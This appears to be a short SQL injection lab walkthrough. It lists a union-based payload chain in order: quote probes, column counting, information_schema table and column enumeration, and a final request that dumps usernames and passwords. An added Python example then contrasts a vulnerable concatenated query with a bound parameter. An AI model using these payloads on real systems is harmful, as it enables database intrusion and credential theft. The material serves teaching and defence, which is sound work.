Query id = 1
select * from aa where id=1
Find the SQL injection point
select * from aa where id=1' and '1'='1
select * from aa where id=1' and '1'='2
Check the number of columns
select * from aa where id=1' order by 3 %23
Find the display positions
select * from aa where id=-1' union select 1,2,3 %23
Find the tables
?id=-1'%20 union select 1,(select group_concat(table_name)from information_schema.tables where table_schema='security'),3 %23
Find the columns
?id=-1'%20 union select 1,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),3 %23
Retrieve the contents
?id=-1'%20 union select 1,(select group_concat(username,0x23,password)from security.users),3 %23
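
Why these requests work, and the fix, as an added example that is not part of the original notes: the same lookup built by string concatenation and with a bound parameter, run against the true/false probe pair from the injection-point step. It assumes an in-memory SQLite stand-in for the table aa; the column names and rows are constructed.

```python
import sqlite3

# Constructed stand-in for the page's table `aa`; columns and rows are assumptions.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("create table aa (id integer, username text, password text)")
    db.executemany("insert into aa values (?, ?, ?)",
                   [(1, "alice", "pw1"), (2, "bob", "pw2")])
    return db

def lookup_concat(db, user_id):
    # Vulnerable pattern: the request value is pasted into the SQL text,
    # so a quote in it ends the string literal and the rest is parsed as SQL.
    return db.execute(f"select * from aa where id='{user_id}'").fetchall()

def lookup_bound(db, user_id):
    # Hardened pattern: the value travels as a bound parameter and is only
    # ever compared as data, whatever characters it contains.
    return db.execute("select * from aa where id = ?", (user_id,)).fetchall()

# A normal value, then the true/false probe pair from the notes above.
PROBES = ["1", "1' and '1'='1", "1' and '1'='2"]

def compare(db):
    # Row counts per probe as (concatenated, bound).
    return {p: (len(lookup_concat(db, p)), len(lookup_bound(db, p)))
            for p in PROBES}

if __name__ == "__main__":
    for probe, (concat_rows, bound_rows) in compare(make_db()).items():
        print(f"{probe!r:20} concat={concat_rows} bound={bound_rows}")
```

With concatenation the two probes return different row counts, which is the signal the injection-point step looks for; with the bound parameter both return nothing because the whole string is compared to id as one value.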